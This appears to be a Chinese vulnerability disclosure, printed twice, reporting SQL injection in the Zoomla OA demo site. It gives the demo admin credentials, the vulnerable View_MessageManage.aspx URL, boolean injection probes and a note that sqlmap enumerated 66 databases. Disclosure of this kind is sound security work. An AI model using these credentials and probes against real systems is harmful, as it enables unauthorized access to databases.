### 简要描述: 这个能算通用吗。。 没什么技术含量 ### 详细说明: 官网演示地址:http://oa.zoomla.cn/ 使用admin admin888登陆 注入点http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 没有经过任何限制,直接可以注入 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=1返回正常 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=2 返回空白 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1' 报错 利用sqlmap可以跑 66个库 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png)
### 简要描述: 这个能算通用吗。。 没什么技术含量 ### 详细说明: 官网演示地址:http://oa.zoomla.cn/ 使用admin admin888登陆 注入点http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 没有经过任何限制,直接可以注入 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=1返回正常 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 and 1=2 返回空白 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1' 报错 利用sqlmap可以跑 66个库 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/181422481812cb7c2e91fcd4cb13c7f5c7cacaa5.png)